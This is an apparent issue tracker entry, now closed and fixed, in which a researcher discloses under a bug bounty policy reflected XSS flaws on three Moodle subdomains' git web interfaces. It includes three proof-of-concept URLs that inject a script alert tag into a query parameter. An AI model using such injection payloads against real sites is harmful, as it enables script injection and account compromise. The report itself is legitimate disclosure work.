Moodle Community Sites / MDLSITE-3072

XSS on 3+ Moodle Subdomains

    Details

    • Type: Bug
    • Status: Closed
    • Priority: High
    • Resolution: Fixed
    • Component/s: git.moodle.org
    • Labels:
      None

      Description

      To Whom It May Concern,

      I am reporting a few XSS security issues in accordance with your Bug
      Bounty security policy:

      https://moodle.org/mod/forum/view.php?f=996&showall=1

      I have included the proof-of-concepts in the email below to help
      expedite the explanation process.

      The information in the attached file is not public.

      Please feel free to contact me if there are any questions. I look
      forward to working with you in order to remediate the reported issues.

      Thanks,
      Ken

      ------------------------------
      http://git.moodle.org/gw?f=%22/%3E%3Cscript%3Ealert%2810%29%3C/script%3E&a=history&hb=cee922825283e76290b681edda93cf09a03d546b&pg=1\n&p=integration.git
      ---------------------------------
      http://broadcast.moodle.org/gw?f="/><script>alert(10)</script>&a=history&hb=7d19bc135372f5e0dc98776871b0287b9b7353da&pg=1\n&p=moodle.git
      ---------------------------------
      http://conference.moodle.org/gw?f="/><script>alert(10)</script>&a=history&hb=cee922825283e76290b681edda93cf09a03d546b&pg=1\n&p=integration.git

            People

            Assignee:
            mspurrier Matt Spurrier
            Reporter:
            kbelva Kenneth Belva
            Tester:
            David Mudrák (@mudrd8mz)
            Participants:
            Component watchers:
            David Mudrák (@mudrd8mz)
            Votes:
            1
            Watchers:
            8
